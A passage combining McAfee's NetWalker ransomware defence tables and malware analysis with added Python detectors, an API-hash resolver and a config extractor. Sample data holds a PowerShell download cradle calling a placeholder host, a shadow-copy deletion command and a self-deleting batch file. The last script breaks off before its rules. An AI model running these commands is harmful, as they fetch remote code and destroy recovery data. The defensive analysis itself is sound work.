| Initial Access | Valid Accounts (T1078): compromised RDP | CSC 5 Secure Configuration of Hardware and Software; CSC 9 Limitation of Network Ports and Protocols; CSC 12 Boundary Defense | Endpoint Security Platform 10.7, Threat Prevention |

As attackers can quickly change spear phishing attachments, it is important to have adaptable defenses that include user awareness training and response procedures, behavior-based malware defenses on email systems, web access and endpoint systems, and finally sec ops playbooks for early detection and response against suspicious email attachments or other phishing techniques. For more information on how McAfee can protect against suspicious email attachments, review this additional blog post.

Using valid accounts and protocols, such as Remote Desktop Protocol (RDP), is an attack technique we have seen rise during the initial COVID-19 period. To further understand how McAfee defends against RDP as an initial access vector, as well as how attackers are using it to deploy ransomware, please see our previous posts.

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rdp-security-explained/

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/cybercriminals-actively-exploiting-rdp-to-target-remote-organizations/

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ens-10-7-rolls-back-the-curtain-on-ransomware/

Exploitation Stage Defensive Overview

The exploitation stage is where the attacker gains access to the target system. Protection at this stage is heavily dependent on system vulnerability management, adaptable anti-malware on both end user devices and servers and security operations tools like endpoint detection and response sensors.

McAfee Endpoint Security 10.7 provides a defense in depth capability including signatures and threat intelligence to cover known bad indicators or programs.

Additionally, machine-learning and behavior-based protection reduces the attack surface against NetWalker and detects new exploitation attack techniques.

For more information on how McAfee Endpoint Security 10.7 can prevent or identify the techniques used in NetWalker, review these additional blog posts.

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ens-10-7-rolls-back-the-curtain-on-ransomware/

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-amsi-integration-protects-against-malicious-scripts/

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/how-to-use-mcafee-atp-to-protect-against-emotet-lemonduck-and-powerminer/

The following chart summarizes the critical security controls expected to have the most effect against exploitation stage techniques and the McAfee solutions to implement those controls where possible.

| MITRE Tactic | MITRE Techniques | CSC Controls | McAfee Portfolio Mitigation |
|---|---|---|---|
| Execution | PowerShell (T1059.001): PowerShell script | CSC 5 Secure Configuration; CSC 8 Malware Defenses | Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection, Application Control (MAC), MVISION EDR |
| Execution | Service Execution (T1569.002): PsExec | CSC 5 Secure Configuration; CSC 8 Malware Defenses | Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection, Application Control (MAC), MVISION EDR |
| Execution | Command and Scripting Interpreter (T1059.003): Windows Command Shell | CSC 5 Secure Configuration; CSC 8 Malware Defenses | Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection, Application Control (MAC), MVISION EDR |
| Execution | Native API (T1106): use of Windows API functions to inject a DLL | CSC 5 Secure Configuration; CSC 8 Malware Defenses | Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection, Application Control (MAC), MVISION EDR |
| Execution | Windows Management Instrumentation (T1047) | CSC 4 Controlled Use of Admin Privileges; CSC 5 Secure Configuration; CSC 8 Malware Defenses; CSC 9 Limitation of Network Ports and Protocols | Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection, Application Control (MAC), MVISION EDR |
| Persistence | Registry Key: place value on RunOnce key (T1060) | CSC 5 Secure Configuration; CSC 8 Malware Defenses | Endpoint Security Platform 10.7, Threat Prevention |
| Persistence | Modify Registry: create own key (T1112) | CSC 5 Secure Configuration; CSC 8 Malware Defenses | Endpoint Security Platform 10.7, Threat Prevention |
| Privilege Escalation | Exploitation for Privilege Escalation (T1068): CVE-2020-0796 | CSC 3 Vulnerability Management; CSC 5 Secure Configuration; CSC 8 Malware Defenses; CSC 12 Boundary Defenses | Network Security Platform (CVE-2020-0796) |
| Privilege Escalation | Exploitation for Privilege Escalation (T1068): CVE-2019-1458 | CSC 3 Vulnerability Management; CSC 5 Secure Configuration; CSC 8 Malware Defenses; CSC 12 Boundary Defenses | Network Security Platform (CVE-2019-1458); Endpoint Security Platform 10.7 (CVE-2019-1458), Threat Prevention, Application Control (MAC) |
| Privilege Escalation | Exploitation for Privilege Escalation (T1068): CVE-2017-0213 | CSC 3 Vulnerability Management; CSC 5 Secure Configuration; CSC 8 Malware Defenses; CSC 12 Boundary Defenses | Network Security Platform (CVE-2017-0213); Endpoint Security Platform 10.7 (CVE-2017-0213), Threat Prevention, Application Control (MAC) |
| Privilege Escalation | Exploitation for Privilege Escalation (T1068): CVE-2015-1701 | CSC 3 Vulnerability Management; CSC 5 Secure Configuration; CSC 8 Malware Defenses; CSC 12 Boundary Defenses | Network Security Platform (CVE-2015-1701); Endpoint Security Platform 10.7, Threat Prevention, Application Control (MAC) |
| Privilege Escalation | Process Injection: Reflective DLL (T1055) | CSC 5 Secure Configuration; CSC 8 Malware Defenses | Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection, MVISION EDR |
| Defense Evasion | Disabling Security Tools (T1562.001): ESET, Trend Micro, MS | CSC 5 Secure Configuration; CSC 8 Malware Defenses | |
| Defense Evasion | Process Injection: Reflective DLL (T1055) | CSC 5 Secure Configuration; CSC 8 Malware Defenses | Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection, MVISION EDR |
| Defense Evasion | Deobfuscate/Decode Files or Information (T1140) | CSC 5 Secure Configuration; CSC 8 Malware Defenses | Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection, MVISION EDR |
| Defense Evasion | Obfuscated Files or Information (T1027): PowerShell script uses Base64 and hexadecimal encoding and XOR encryption | CSC 5 Secure Configuration; CSC 8 Malware Defenses; CSC 12 Boundary Defenses | Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection, MVISION EDR |
| Credential Access | Credential Dumping (T1003): Mimikatz, Mimidogz, Mimikittenz, Pwdump, LaZagne, Windows Credentials | CSC 4 Controlled Use of Admin Privileges; CSC 5 Secure Configuration; CSC 8 Malware Defenses | Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection, Application Control (MAC), MVISION EDR |
| Credential Access | Brute Force (T1110): NL Brute | CSC 4 Controlled Use of Admin Privileges; CSC 16 Account Monitoring | Enterprise Security Manager – Log Analysis |

Impact Stage Defensive Overview

The impact stage is where the attacker encrypts the target system and its data, and perhaps moves laterally to other systems on the network. Protection at this stage is heavily dependent on adaptable anti-malware on both end user devices and servers, network controls, and security operations’ capability to monitor logs for anomalies in privileged access or network traffic. The following chart summarizes the controls expected to have the most effect against impact stage techniques and the McAfee solutions to implement those controls where possible.

| MITRE Tactic | MITRE Techniques | CSC Controls | McAfee Portfolio Mitigation |
|---|---|---|---|
| Discovery | Network Service Scanning (T1046): network scanner | CSC 5 Secure Configuration; CSC 8 Malware Defenses; CSC 12 Boundary Defenses | Endpoint Security Platform 10.7, Threat Prevention, Application Control (MAC), Network Security Platform |
| Lateral Movement | Third Party Software (T1072): TeamViewer, AnyDesk | CSC 5 Secure Configuration; CSC 8 Malware Defenses; CSC 12 Boundary Defenses | Endpoint Security Platform 10.7, Threat Prevention, Network Security Platform |
| Lateral Movement | Service Execution (T1035): PsExec | CSC 5 Secure Configuration; CSC 8 Malware Defenses; CSC 12 Boundary Defenses | Endpoint Security Platform 10.7, Threat Prevention, MVISION EDR |
| Collection | Data from Information Repositories (T1213) | CSC 4 Controlled Use of Admin Privileges; CSC 5 Secure Configuration; CSC 6 Log Analysis | Enterprise Security Manager – Log Collection and Analysis |
| Collection | Data from Local System (T1005) | CSC 4 Controlled Use of Admin Privileges; CSC 5 Secure Configuration; CSC 6 Log Analysis | Endpoint Security Platform 10.7, Threat Prevention, MVISION EDR |
| Collection | Data from Network Shared Drive (T1039) | CSC 4 Controlled Use of Admin Privileges; CSC 5 Secure Configuration; CSC 6 Log Analysis | Endpoint Security Platform 10.7, Threat Prevention, MVISION EDR |
| Command and Control | Ingress Tool Transfer (T1105) | CSC 8 Malware Defenses; CSC 12 Boundary Defenses | Web Gateway, Network Security Platform |
| Impact | Data Encrypted (T1486): NetWalker ransomware | CSC 5 Secure Configuration; CSC 8 Malware Defenses | Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection, MVISION EDR, Web Gateway |
| Impact | Inhibit System Recovery (T1490): Shadow | CSC 5 Secure Configuration; CSC 8 Malware Defenses | Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection, MVISION EDR, Web Gateway |

Hunting for NetWalker Indicators

As a threat intel analyst or hunter, you might want to quickly scan your systems for any NetWalker indicators. Of course, you can do that manually by downloading a list of indicators and searching with available tools. However, if you have MVISION EDR, you will be able to run that search right from Insights, saving precious time. Hunting the attacker can be a game of inches, so every second counts. If you find infected systems or systems with indicators, you can take action to contain them and start an incident response investigation immediately from the MVISION EDR console.

Proactively Detecting NetWalker Techniques

Many of the exploit stage techniques in this attack use legitimate Windows tools or valid accounts to either exploit, avoid detection or move laterally. These techniques are not easily prevented but can be detected using MVISION EDR. As security analysts, we want to focus on suspicious techniques, such as PowerShell being used to download files, to execute scripts, or to evade defenses.
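As an added example (not McAfee's or MVISION EDR's detection logic), the following script scores process-creation events for the three PowerShell behaviours called out above: download cradles, script execution and defense-evasion switches, including decoding an -EncodedCommand so a cradle hidden inside it is still caught. All event records, hosts, users and URLs are constructed placeholders.

```python
"""Added example, not MVISION EDR's or McAfee's detection logic: score
process-creation events for the PowerShell behaviours the post highlights
(download cradles, script execution, defense-evasion switches, encoded
commands). All event records below are constructed sample data."""
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Download cradles (T1105 ingress tool transfer via PowerShell).
DOWNLOAD = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bwget\b|\bcurl\b"
    r"|start-bitstransfer", re.I)
# Script execution (T1059.001).
SCRIPT_EXEC = re.compile(r"invoke-expression|\biex\b|\.ps1\b", re.I)
# Switches commonly used to hide the window or bypass controls.
EVASION = re.compile(
    r"-nop\b|-noprofile\b|-w(?:indowstyle)?\s+hidden|-ep\s+bypass"
    r"|-executionpolicy\s+bypass|-noni\b|-noninteractive\b", re.I)
# -EncodedCommand / -enc / -ec / -e followed by a base64 blob (T1027).
ENCODED = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{16,})", re.I)
POWERSHELL = ("powershell.exe", "pwsh.exe")


@dataclass
class Event:
    host: str
    user: str
    image: str      # full path of the created process
    cmdline: str


@dataclass
class Finding:
    host: str
    user: str
    techniques: List[str] = field(default_factory=list)
    decoded: str = ""   # plaintext of an -EncodedCommand, if any


def decode_encoded_command(cmdline: str) -> str:
    """PowerShell's -EncodedCommand is base64 over UTF-16LE text."""
    m = ENCODED.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace")
    except ValueError:
        return ""


def analyze(event: Event) -> Optional[Finding]:
    """Return a Finding when a PowerShell launch shows suspicious behaviour."""
    if not event.image.lower().endswith(POWERSHELL):
        return None
    decoded = decode_encoded_command(event.cmdline)
    # Match against the raw command line and the decoded payload together,
    # so a cradle hidden inside an encoded command is still caught.
    corpus = event.cmdline + " " + decoded
    finding = Finding(event.host, event.user, decoded=decoded)
    if DOWNLOAD.search(corpus):
        finding.techniques.append("T1105 download cradle")
    if SCRIPT_EXEC.search(corpus):
        finding.techniques.append("T1059.001 script execution")
    if EVASION.search(event.cmdline):
        finding.techniques.append("evasion switches (hidden/bypass/noprofile)")
    if decoded:
        finding.techniques.append("T1027 encoded command")
    return finding if finding.techniques else None


def triage(events: List[Event]) -> List[Finding]:
    """Findings ordered by how many suspicious behaviours each one stacks."""
    hits = [f for f in (analyze(e) for e in events) if f is not None]
    return sorted(hits, key=lambda f: len(f.techniques), reverse=True)


# Constructed sample events (hosts, users and URLs are placeholders).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://PLACEHOLDER.example/b.ps1')"
_ENC = base64.b64encode(_CRADLE.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    Event("WS-01", "alice", PS, "powershell.exe Get-Process"),
    Event("WS-02", "bob", PS,
          "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
          ".DownloadString('http://PLACEHOLDER.example/a.ps1')\""),
    Event("SRV-03", "svc_backup", PS,
          f"powershell.exe -ExecutionPolicy Bypass -EncodedCommand {_ENC}"),
    Event("WS-04", "carol", r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami"),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f.host} ({f.user}): {', '.join(f.techniques)}")
        if f.decoded:
            print("  decoded:", f.decoded)
```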

Monitoring or Reporting on NetWalker Events

Events from McAfee Endpoint Protection and Web Gateway play a key role in NetWalker incident and threat response. McAfee ePO centralizes event collection from all managed endpoint systems. As a threat responder, you may want to create a dashboard for NetWalker-related threat events to understand current exposure. Here is a list (not exhaustive) of NetWalker-related threat events as reported by Endpoint Protection Platform Threat Prevention Module and McAfee Web Gateway.

McAfee Endpoint Threat Prevention Events

McAfee Web Gateway Events

Summary

Ransomware has evolved into a lucrative business for threat actors, from underground forums selling ransomware, to services such as support portals that guide victims through acquiring cryptocurrency for payment, to the negotiation of the ransom. However, just as attackers work together, defenders must collaborate internally and externally to build an adaptive security architecture that makes it harder for threat actors to succeed and builds resilience into the business. This blog highlights how to use McAfee’s security solutions to prevent, detect and respond to NetWalker and to attackers using similar techniques.

McAfee ATR is actively monitoring ransomware threats and will continue to update McAfee MVISION Insights and its social networking channels with new and current information. Want to stay ahead of the adversaries? Check out McAfee MVISION Insights for more information.

Take a “NetWalk” on the Wild Side (Mon, 03 Aug 2020) https://www.mcafee.com/blogs/other-blogs/mcafee-labs/take-a-netwalk-on-the-wild-side/


Executive Summary

The NetWalker ransomware, initially known as Mailto, was first detected in August 2019. Since then, new variants were discovered throughout 2019 and the beginning of 2020, with a strong uptick noticed in March of this year.

NetWalker has noticeably evolved to a more stable and robust ransomware-as-a-service (RaaS) model, and our research suggests that the malware operators are targeting and attracting a broader range of technically advanced and enterprising criminal affiliates.

McAfee Advanced Threat Research (ATR) discovered a large sum of bitcoins linked to NetWalker, which suggests its extortion efforts are effective and that many victims have had no option other than to succumb to its criminal demands.

We approached our investigation of NetWalker with some possible ideas about the threat actor behind it, only to later disprove our own hypothesis. We believe the inclusion of our thinking, and the means with which we debunked our own theory, highlight the importance of thorough research and we welcome further discussion on this topic. We believe it starts valuable discussions and helps avoid duplicate research efforts by others. We also encourage our peers in the industry to share information with us in case you have more evidence.

McAfee protects its customers against the malware covered in this blog in all its products, including personal antivirus, endpoint and gateway. To learn more about how McAfee products can defend against these types of attacks, visit our blog on Building Adaptable Security Architecture Against NetWalker.

Check out McAfee Insights to stay on top of NetWalker’s latest developments and intelligence on other cyber threats, all curated by the McAfee ATR team. Not only that, Insights will also help you prioritize threats, predict if your countermeasures will work and prescribe corrective actions.

Introduction

Since 2019, NetWalker ransomware has reached a vast number of different targets, mostly based in western European countries and the US. Since the end of 2019, the NetWalker gang has indicated a preference for larger organisations rather than individuals. During the COVID-19 pandemic, the adversaries behind NetWalker clearly stated that hospitals will not be targeted; whether they keep to their word remains to be seen.

The ransomware appends a random extension to infected files and uses Salsa20 encryption. It uses some tricks to avoid detection, such as a new defence evasion technique, known as reflective DLL loading, to inject a DLL from memory.

The NetWalker collective, much like those behind Maze, REvil and other ransomware, threatens to publish victims’ data if ransoms are not paid.

As mentioned earlier, NetWalker RaaS prioritizes quality over quantity and is looking for people who are Russian-speaking and have experience with large networks. People who already have a foothold in a potential victim’s network and can exfiltrate data with ease are especially sought after. This is not surprising, considering that publishing a victim’s data is part of NetWalker’s model.

The following sections are dedicated to introducing the NetWalker malware and displaying the telemetry status before moving on to the technical malware analysis of the ransomware’s behaviour. We will explain how the decryptor works and show some interactions between NetWalker’s operators and their victims. After this, we discuss the changes in modus operandi since September 2019, especially regarding payment behaviour. Then we show our attempts, unfruitful as they were, at discovering a link between NetWalker and previous, seemingly unrelated ransomware variants. Finally, we deliver an overview of IOCs related to NetWalker and its MITRE ATT&CK techniques.

Telemetry

Using McAfee’s billion Insights sensors, we can show the global prevalence of the NetWalker ransomware.

Figure 1. McAfee MVISION Insights shows global prevalence of the NetWalker ransomware

Technical Analysis

Ransom note (pre-March 2020)

Before March 2020, the NetWalker ransom note indicated how to contact the adversary directly using anonymous email account services with random names (such as kkeessnnkkaa@cock.li and hhaaxxhhaaxx@tuta.io):

Figure 2. Example of ransom note prior to March 2020

Ransom Note (Post-March 2020)

On 12 March 2020, a researcher shared a screenshot of a new NetWalker ransom note in a tweet and we can see that the attackers have changed the contact method significantly. Email communication has been dropped completely with victims now required to make contact through the NetWalker Tor interface where, after submitting their user key, they will then be redirected to a chat with NetWalker technical support. This change in contact method coincides with underground forum postings where NetWalker revealed it was opening its RaaS up for new affiliates. The Tor page was not the only noticeable change we will highlight in this blog.

Figure 3. Example of ransom note after March 2020

NetWalker Analysis

Figure 4. NetWalker behavior

NetWalker Resource Analysis (Pre-March 2020)

The NetWalker malware uses a custom resource type (1337 or 31337) containing its entire configuration. This resource is extracted to memory and decrypted using the RC4 algorithm with a hard-coded key stored in the resource itself.

Before 12 March 2020, NetWalker used email contact between its support operation and the victims to proceed with payment and send the decryption program. To do this, NetWalker used the configuration file in the resource to set the encryption mode, the ransom note name, the contact email addresses and other parameters.

Name wwllww.exe
Size 96256 bytes
File-Type EXE
SHA 256 58e923ff158fb5aecd293b7a0e0d305296110b83c6e270786edcc4fea1c8404c
Compile time 6 December 2019

Figure 5. NetWalker resource from wwllww.exe

Once decrypted, the configuration file reveals several parameters, allowing us to understand how it works (how it constitutes the ransom note, the number of threads allocated for encryption, etc.):

mpk Public key
mode Encryption mode
thr Allocated threads for encryption process
spsz Encryption chunk
namesz Name length
idsz  ID length
crmask .mailto[email].{ID}
mail Contact mail
lfile Ransom Note name
lend B64 encoded ransom note
white Encryption whitelist
kill Processes, tasks, service names to terminate
unlocker Decryption exclusion list

NetWalker Resource Analysis (Post-March 2020)

When NetWalker changed its contact mode and switched from email to the submission of the user key directly on the web portal of the group's blog, the configuration file in the resource also changed. We found changes in the configuration file, such as the disappearance of the contact "mail" and "crmask" fields (previously set to XXX@cock.li, XXX@tuta.io, etc., and .mailto[email].{ID}). These fields were replaced by "onion1" and "onion2", which are set to the NetWalker blog URL/payment page (hxxp://rnfdsgm<snip>drqqd.onion/). We also noticed that the NetWalker developers complemented their "unlocker" field with some specific values (e.g. "psexec.exe, system, forti*.exe, fmon.exe*", etc.).

Name cnt.ex
Size 70656 bytes
File-Type EXE
SHA 256 26dfa8512e892dc8397c4ccbbe10efbcf85029bc2ad7b6b6fe17d26f946a01bb
Compile time 2 May 2020

Figure 6. NetWalker resource from cnt.ex

Usually, attackers store their payload in a standard resource type such as RC_DATA or in a malicious BITMAP. The latter can be a regular bitmap (the open matrix image format used by Windows) whose pixels are a binary representation of the payload, used to execute code or as a payload dropper; the chain is then EXE -> resource -> BMP with data embedded in the pixels, fetched and decrypted by, for example, a DLL -> payload. NetWalker instead uses a custom resource type (1337 or 31337) to increase obfuscation. The resource format itself did not change between versions; however, as we said, several configuration values were changed or replaced:

mpk Public Key
mode Encryption mode
spsz Encryption chunk
thr Allocated threads for encryption process
namesz Name length
idsz ID length
lfile Ransom Note name
onion1 Blog URL 1
onion2 Blog URL 2
white Encryption whitelist
kill Processes, tasks, service names to terminate
net Network resources encryption
unlocker Decryption exclusion list
lend B64 encoded ransom note


NetWalker Executable Analysis (Post-March 2020)

The malware sample used for the rest of this blog post shares the same size, file type and compile time:

Name c21ecd18f0bbb28112240013ad42dad5c01d20927791239ada5b61e1c6f5f010
Size 70656 bytes
File-Type EXE
SHA 256 c21ecd18f0bbb28112240013ad42dad5c01d20927791239ada5b61e1c6f5f010
Compile time 2 May 2020

The unpacked malware is a 32-bit Windows executable (EXE).

Figure 7. Information sample of the malware

The malware's first action is to resolve all the functions it needs in one large routine, taking them from the modules already loaded in the process and from additional DLLs as described below.

Instead of searching for the functions in the usual way, the malware computes a CRC32 hash of the name of each exported function and compares it with hardcoded values. Additionally, instead of calling "GetProcAddress", the malware walks the Process Environment Block (PEB) to locate the loaded modules, which makes analysis harder.

Figure 8. Get the module accessing the PEB and using a CRC32

If the module is not found among the loaded modules, it is loaded with "LdrLoadDll", a native Windows function, to try to avoid hooks on the usual functions, e.g. "LoadLibraryW":

Figure 9. Load library using LdrLoadDll

Figure 10. Get functions from module, e.g. using a CRC32 hash

If the malware fails to resolve a function, it calls "sleep" and terminates itself.
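The hash comparison described above is what an analyst has to reverse when a sample resolves APIs this way: lift the hardcoded DWORDs from the resolver routine, hash every export name of the candidate DLLs with the same algorithm and look the constants up. The following script is an added example written for this page, not code from the NetWalker sample or from McAfee. It assumes the standard CRC32 (zlib polynomial) over the export name as written; the write-up does not give NetWalker's exact CRC32 parameters, and the "hardcoded" values and export lists below are constructed for the demonstration.

```python
import zlib

# Constructed export lists for the two modules the write-up mentions. A real
# resolver would dump the full export tables (e.g. with pefile) from the
# victim's DLLs, since the hash is computed over the exact exported name.
SAMPLE_EXPORTS = {
    "kernel32.dll": ["LoadLibraryW", "GetProcAddress", "FindResourceA",
                     "LoadResource", "LockResource", "SizeofResource",
                     "WriteFile", "CreateFileW", "ExitProcess"],
    "ntdll.dll": ["LdrLoadDll", "NtAllocateVirtualMemory", "NtClose"],
}


def api_hash(name: str) -> int:
    """CRC32 of the ASCII export name.

    Assumption: the standard CRC32 (zlib polynomial, init 0xFFFFFFFF, final
    XOR) over the name as written. Malware families vary the polynomial, the
    initial value or the case of the name, and the write-up does not state
    which variant NetWalker uses; swap this function if the sample's
    constants do not resolve.
    """
    return zlib.crc32(name.encode("ascii")) & 0xFFFFFFFF


def build_hash_table(exports: dict) -> dict:
    """Map hash -> [(module, export name)], keeping any collisions visible."""
    table = {}
    for module, names in exports.items():
        for name in names:
            table.setdefault(api_hash(name), []).append((module, name))
    return table


def resolve_hashes(hashes, table: dict) -> dict:
    """Return {hash: [(module, name), ...]} for each hardcoded value.

    Unresolved hashes map to an empty list so they stand out in the output.
    """
    return {h: table.get(h, []) for h in hashes}


# Constructed stand-in for the hardcoded DWORDs an analyst would lift from the
# resolver routine; these are NOT values taken from the NetWalker sample.
HARDCODED = [api_hash("LdrLoadDll"), api_hash("FindResourceA"),
             api_hash("WriteFile"), 0xDEADBEEF]

if __name__ == "__main__":
    table = build_hash_table(SAMPLE_EXPORTS)
    for h, hits in resolve_hashes(HARDCODED, table).items():
        print(f"0x{h:08X} -> {hits or 'unresolved'}")
```

Because the table is built from export names rather than addresses, it can be generated once per DLL version and reused across samples of the same family; an unresolved constant usually means a different CRC32 variant, a lowercase name, or an export from a DLL that has not been added to the table.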

Later, the malware extracts the configuration file from a resource with a custom type and a custom name using the functions "FindResourceA", "LoadResource", "LockResource" and "SizeofResource". The file extracted in memory is decrypted using the RC4 algorithm with a hardcoded key stored in the resource.

The struct of the resource is:

  • 4 bytes -> The size of the hardcoded key to decrypt the configuration file.
  • Variable size -> the hardcoded key to decrypt the configuration file.
  • Variable size -> the configuration file encrypted.

The malware reads the first 4 bytes, allocates a buffer of the key size for the key and another buffer of the resource size minus 4 bytes minus the key size for the encrypted configuration. Finally, it decrypts the configuration file:

Figure 11. Get configuration file and decrypt it

If the malware fails to get the configuration file, it will terminate itself.
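The resource layout and the field tables above are enough to write an extractor. The script below is an added example for this page, not code from the sample or from McAfee: it implements RC4, parses the length-prefixed resource and decodes the fields an analyst wants first. It assumes the length field is a little-endian DWORD and that the decrypted configuration is a JSON object keyed as in the post-March-2020 table; the sample configuration, key and every value in it are constructed placeholders, not data from a real resource.

```python
import base64
import json
import struct


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def parse_resource(blob: bytes):
    """Split the resource into (key, plaintext config) using the layout above:
    4-byte key length, the key, then the RC4-encrypted configuration.
    Assumption: the length is a little-endian DWORD, as is usual on Windows."""
    if len(blob) < 4:
        raise ValueError("resource shorter than the 4-byte length field")
    key_len = struct.unpack("<I", blob[:4])[0]
    if key_len == 0 or 4 + key_len >= len(blob):
        raise ValueError("key length does not fit inside the resource")
    key = blob[4:4 + key_len]
    return key, rc4(key, blob[4 + key_len:])


def extract_config(blob: bytes) -> dict:
    """Decrypt the resource and decode the fields an analyst wants first.
    Assumption: the decrypted config is a JSON object keyed as in the field
    tables above; 'lend' holds the base64-encoded ransom note."""
    _, plain = parse_resource(blob)
    cfg = json.loads(plain.decode("utf-8"))
    if "lend" in cfg:
        cfg["ransom_note"] = base64.b64decode(cfg["lend"]).decode("utf-8", "replace")
    return cfg


def build_resource(key: bytes, config: dict) -> bytes:
    """Inverse of parse_resource, used only to construct test input here."""
    plain = json.dumps(config).encode("utf-8")
    return struct.pack("<I", len(key)) + key + rc4(key, plain)


# Constructed configuration using the post-March-2020 field names; every value
# is a placeholder, not data from a real sample.
SAMPLE_CONFIG = {
    "mpk": base64.b64encode(b"placeholder-public-key").decode(),
    "mode": 0, "thr": 4, "spsz": 1024, "namesz": 8, "idsz": 8,
    "lfile": "{id}-Readme.txt",
    "onion1": "hxxp://placeholder1.onion/",
    "onion2": "hxxp://placeholder2.onion/",
    "white": ["*\\windows\\*", "*.dll"],
    "kill": ["sql*"],
    "net": False,
    "unlocker": ["psexec.exe"],
    "lend": base64.b64encode(b"Your files are encrypted.").decode(),
}
SAMPLE_KEY = b"constructed-rc4-key"
SAMPLE_RESOURCE = build_resource(SAMPLE_KEY, SAMPLE_CONFIG)

if __name__ == "__main__":
    cfg = extract_config(SAMPLE_RESOURCE)
    print(cfg["onion1"], cfg["thr"], repr(cfg["ransom_note"]))
```

Against a real sample, replace SAMPLE_RESOURCE with the bytes of the 1337/31337 resource dumped from the PE (for instance with pefile or Resource Hacker); the length check guards against a truncated dump or a resource that is not actually in this layout.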

After getting the configuration file, the malware parses it, saves the fields in memory and writes to the registry the information needed to encrypt the files on the machine. It first tries to write under the registry hive "HKEY_LOCAL_MACHINE"; if it cannot create the key there, it falls back to "HKEY_CURRENT_USER":

Figure 12. Write in the registry

After writing to the registry, it enables special privileges on its token, such as SE_DEBUG_PRIVILEGE and SE_IMPERSONATE_PRIVILEGE:

Figure 13. Get some special privileges in the token

Later, the malware creates three threads: one to collect information about the machine, such as the operating system version, one to enumerate processes and one to enumerate services on the system.

After this step, it gets the system directory and runs "vssadmin" to delete the Volume Shadow Copies of the system. Shadow copies can contain pre-encryption copies of the files and would be a restore option if no backup exists.

Figure 14. Delete the shadow volumes

Later, the malware enumerates the logical drives, prepares the new extension for the encrypted files (a random extension whose length is defined in the ransomware config) and encrypts all files on fixed and remote (network) drives, appending the new extension.

Figure 15. Crypt the files

After all these steps have been completed, it creates the ransom note on the desktop using the functions "SHGetFolderPathW" and "CreateFileW", then writes the ransom note from memory into the new file with "WriteFile". The malware also creates the ransom note in the root folder (for example "C:\") of each logical drive. Next, it launches "notepad.exe" with the ransom note file as argument to show the user what happened on the system:

Figure 16. Creation of the ransom note in the desktop and root units

Finally, after encrypting the files and creating the ransom note, the malware creates a batch file with a temporary name in the %temp% folder and writes into it the commands to destroy itself: it uses "taskkill" to end its own process, deletes the malware sample by path with the "del" command and finally deletes the batch file itself with "del %0%". Since "del" only removes the directory entry and does not overwrite the file contents, both the sample and the batch file can, with some luck, be recovered with forensic tools.

This way the malware tries to remove itself from the machine to avoid being detected and analyzed by security researchers:

Figure 17. Get Temp path and make a temporary file as a bat and launch it

Finally, the malware will finish with “ExitProcess”.
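The behaviour chain just described (shadow copy deletion, the ransom note opened in notepad.exe, the self-deleting batch file run from %temp%) is what a detection engineer would turn into process-creation rules. The script below is an added example for this page, not McAfee detection content: it runs three rules over constructed Sysmon-style events and checks a constructed batch file for the taskkill/del %0 pattern. The vssadmin arguments, file names and paths are plausible stand-ins; the write-up only says that "vssadmin" is used and that the .bat has a temporary name in %temp%. The T1070.004 mapping for the self-deletion is the editor's, as the page's ATT&CK list does not include it.

```python
import re

# Constructed process-creation events in Sysmon Event ID 1 style; not real
# telemetry. Paths and arguments are invented for the demonstration.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin.exe delete shadows /all /quiet",
     "parent_image": r"C:\Users\bob\AppData\Local\Temp\cnt.ex"},
    {"image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c C:\Users\bob\AppData\Local\Temp\tmpA1B2.bat",
     "parent_image": r"C:\Users\bob\AppData\Local\Temp\cnt.ex"},
    {"image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe C:\Users\bob\Desktop\a1b2c3d4-Readme.txt",
     "parent_image": r"C:\Users\bob\AppData\Local\Temp\cnt.ex"},
    # Benign administrator activity that must not fire.
    {"image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin.exe list shadows",
     "parent_image": r"C:\Windows\System32\cmd.exe"},
]

# Constructed contents of the self-deletion batch file described above.
SAMPLE_BAT = (
    "taskkill /f /im cnt.ex\r\n"
    "del \"C:\\Users\\bob\\AppData\\Local\\Temp\\cnt.ex\"\r\n"
    "del %0%\r\n"
)

# Parents living in user-writable locations are treated as suspicious; a
# system binary spawning the same command line gets a pass for the weaker rules.
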